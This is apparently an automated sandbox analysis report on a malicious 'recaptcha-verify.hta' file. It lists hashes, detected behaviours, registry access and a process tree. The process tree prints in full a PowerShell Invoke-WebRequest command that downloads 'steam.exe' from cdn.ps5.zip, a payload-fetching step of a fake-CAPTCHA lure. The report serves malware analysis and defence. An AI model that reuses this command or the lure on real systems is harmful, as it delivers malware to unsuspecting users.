Analysis
- max time kernel: 15s
- max time network: 16s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 20/01/2025, 17:07
Static task: static1
Behavioral task: behavioral1
Sample: recaptcha-verify.hta
Resource: win7-20240903-en
General
- Target: recaptcha-verify.hta
- Size: 2KB
- MD5: 0b7e92d23c4b2765b641fa4236564270
- SHA1: d1763d696b8e530c8f29026ba0f3278c77660f26
- SHA256: 19fb3108a5c7a3bc2694062805359f555450524a6fbf1eba7c30a544e1749f94
- SHA512: 5ac9164afbff95b0ecf3e782037983736a93017d10b7564239bae0b3002d5be18401102a05e1e031c75198e35b08463b1a729482ddffcd4144546092ef36fb13
Malware Config
Signatures
- Blocklisted process makes network request 8 IoCs
  flow  pid   Process
  6     2316  mshta.exe
  7     2316  mshta.exe
  10    2316  mshta.exe
  11    2316  mshta.exe
  14    2316  mshta.exe
  15    2316  mshta.exe
  18    2316  mshta.exe
  19    2316  mshta.exe
- Command and Scripting Interpreter: PowerShell
  pid   Process
  2728  powershell.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
- Modifies Internet Explorer settings
  description  ioc                                                                                                    Process
  Key created  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: EnumeratesProcesses 1 IoCs
  pid   Process
  2728  powershell.exe
- Suspicious use of AdjustPrivilegeToken 1 IoCs
  description              pid   Process
  Token: SeDebugPrivilege  2728  powershell.exe
- Suspicious use of WriteProcessMemory 8 IoCs
  description                       pid   Process    procid_target
  PID 2316 wrote to memory of 2240  2316  mshta.exe  32
  PID 2316 wrote to memory of 2240  2316  mshta.exe  32
  PID 2316 wrote to memory of 2240  2316  mshta.exe  32
  PID 2316 wrote to memory of 2240  2316  mshta.exe  32
  PID 2240 wrote to memory of 2728  2240  cmd.exe    34
  PID 2240 wrote to memory of 2728  2240  cmd.exe    34
  PID 2240 wrote to memory of 2728  2240  cmd.exe    34
  PID 2240 wrote to memory of 2728  2240  cmd.exe    34
Processes
- C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta"
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID: 2316
  - C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -Uri 'https://cdn.ps5.zip/steam.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe'"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2240
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://cdn.ps5.zip/steam.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe'"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2728
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\favicon[1].ico
  Filesize: 5KB
  MD5: f3418a443e7d841097c714d69ec4bcb8
  SHA1: 49263695f6b0cdd72f45cf1b775e660fdc36c606
  SHA256: 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
  SHA512: 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563